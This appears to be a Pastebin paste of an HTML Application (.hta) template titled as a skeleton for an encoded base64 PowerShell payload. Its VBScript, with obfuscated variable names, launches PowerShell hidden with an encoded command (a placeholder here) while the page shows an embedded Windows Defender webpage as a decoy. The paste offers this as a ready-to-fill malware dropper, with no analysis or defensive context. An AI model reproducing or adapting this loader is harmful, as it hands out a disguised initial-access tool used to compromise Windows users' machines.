illwill

.hta skeleton with encoded base64 powershell payload

May 17th, 2017
1,156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
  2.    <html xmlns="http://www.w3.org/1999/xhtml">  
  3.    <head>  
  4.    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />  
  5.    <title>Bonjour</title>  
  6.  <script language="VBScript">  
  7.   Set owFrClN0giJ = CreateObject("Wscript.Shell")  
  8.   Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")  
  9.   If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then  
  10.    owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"  
  11.   End If  
  12.  </script>  
  13.  <hta:application  
  14.      id="oHTA"  
  15.      applicationname="Bonjour"  
  16.      application="yes"  
  17.    >  
  18.    </hta:application>  
  19.    </head>  
  20.    <div>  
  21.    <object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">  
  22.    </object></div>    
  23.    <body>  
  24.    </body>  
  25.    </html>
Add Comment
Please, Sign In to add comment